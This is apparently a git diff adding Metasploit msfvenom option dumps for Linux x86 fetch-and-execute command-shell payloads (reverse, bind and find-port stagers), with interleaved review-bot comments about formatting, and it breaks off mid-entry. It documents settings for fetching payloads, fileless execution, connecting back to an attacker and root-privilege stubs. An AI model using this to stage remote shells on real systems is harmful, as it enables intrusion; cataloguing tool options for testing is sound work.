+ + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string 
to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_nonx_tcp.txt new file mode 100644 index 0000000..3b69c97 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_nonx_tcp.txt 
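Review bot: the ReverseAllowProxy description in this hunk is broken across two lines ("Allow reverse tcp even with Proxies specified." followed by "Connect back will NOT go through proxy but directly to LHOST"), whereas the same option is a single line in the sibling reverse_nonx_tcp, reverse_tcp and reverse_tcp_uuid dumps; check whether the committed file really contains the stray newline, since anything parsing these dumps by column would misread that row. Separately, the FETCH_FILELESS description has an unclosed parenthesis before "(Accepted: none, bash, python3.8+)", which is inherited from Metasploit and not something to fix in this dump.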
@@ -0,0 +1,99 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/shell/reverse_nonx_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jISfGhfzdo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp.txt new file mode 100644 index 0000000..5ae5096 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp.txt 
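Review bot: the Name field in the reverse_nonx_tcp hunk ("HTTP Fetch, Linux Command Shell, Reverse TCP Stager") is identical to the Name in the reverse_tcp and reverse_tcp_uuid dumps, so only the Module line (payload/cmd/linux/http/x86/shell/reverse_nonx_tcp) distinguishes the files; anything that indexes this directory by Name should key on Module instead, and a README line stating that would help.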
@@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DQeueGGNek no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp_uuid.txt new file mode 100644 index 0000000..2beab84 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-x86-shell-reverse_tcp_uuid.txt 
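Review bot: FETCH_SRVHOST is marked Required "no" in the reverse_tcp hunk and in the other reverse_* dumps but "yes" in the bind_tcp_uuid dump above; if that reflects the reverse stagers falling back to LHOST for the fetch server the difference is expected, but it reads like a capture inconsistency at first glance, so a one-line explanation in the commit message or README would save the next reviewer the same question.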
@@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/shell/reverse_tcp_uuid + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME hCisBzlaR no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak 
false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_ipv6_tcp.txt new file mode 100644 index 0000000..2bf0fb0 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_ipv6_tcp.txt 
@@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6) + Module: payload/cmd/linux/http/x86/shell_bind_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HcneUTaecKE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection over IPv6 and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no 
Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp.txt new file mode 100644 index 0000000..b416c1f --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp.txt 
@@ -0,0 +1,80 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/x86/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TJAoCNlYq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no 
Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp_random_port.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp_random_port.txt new file mode 100644 index 0000000..b20690a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_bind_tcp_random_port.txt 
@@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/http/x86/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Geyslan G. Bem + Aleh Boitsau + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JeFkohSq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system 
call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_port.txt new file mode 100644 index 0000000..147798e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-shell_find_port.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/http/x86/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 39836 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ooCCdOcJCmDt no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP 